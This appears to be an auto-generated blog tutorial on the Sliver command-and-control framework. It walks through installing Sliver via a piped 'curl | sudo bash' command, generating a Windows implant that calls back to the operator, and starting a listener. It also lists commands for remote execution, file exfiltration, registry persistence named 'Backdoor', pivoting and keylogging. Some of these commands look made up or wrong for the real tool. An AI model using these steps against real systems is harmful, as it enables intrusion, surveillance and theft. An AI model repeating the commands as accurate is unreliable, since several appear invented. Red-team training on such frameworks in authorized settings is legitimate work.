Sliver is a powerful Command and Control (C2) framework used in penetration testing and red teaming. If you’re new to C2 operations, this guide will help you understand Sliver’s basics, including setup, commands, and practical usage.
Getting Started with Sliver
Installation
Sliver supports multiple platforms (Linux, Windows, macOS). Here’s how to install it on Linux:
Install dependencies sudo apt update && sudo apt install -y mingw-w64 binutils-multiarch Download and install Sliver curl https://sliver.sh/install | sudo bash
Starting the Server
Run the Sliver server:
sliver-server
Generating Implants (Payloads)
Create a payload for a target system:
generate --mtls <YOUR_IP> --os windows --arch amd64 --save /tmp/win_sliver.exe
Listener Setup
Start an mTLS listener:
mtls --lport 8443
You Should Know: Essential Sliver Commands
Basic C2 Operations
1. List Active Sessions
sessions
2. Interact with a Session
use <SESSION_ID>
3. Execute Commands on Target
execute --command "whoami"
4. Upload/Download Files
upload /local/file.txt C:\Windows\Temp\file.txt download C:\Windows\Temp\file.txt /local/downloaded.txt
5. Persistence Techniques
persistence --method registry --name "Backdoor"
Advanced Post-Exploitation
- Privilege Escalation Checks
run-executable --process winPEAS.bat
Lateral Movement
pivoting start --bind 0.0.0.0:4444
Keylogging
keylogger start
What Undercode Say
Sliver is a versatile C2 framework that simplifies red team operations. Mastering it requires hands-on practice with implants, listeners, and post-exploitation modules. Always use Sliver ethically in authorized engagements.
Expected Output:
A functional C2 setup with active implants, allowing remote command execution, file transfers, and persistence.
Prediction
As C2 frameworks evolve, Sliver may integrate more evasion techniques and AI-driven automation, making it a preferred choice for red teams.
Reference:
References:
Reported By: Matthew Y – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅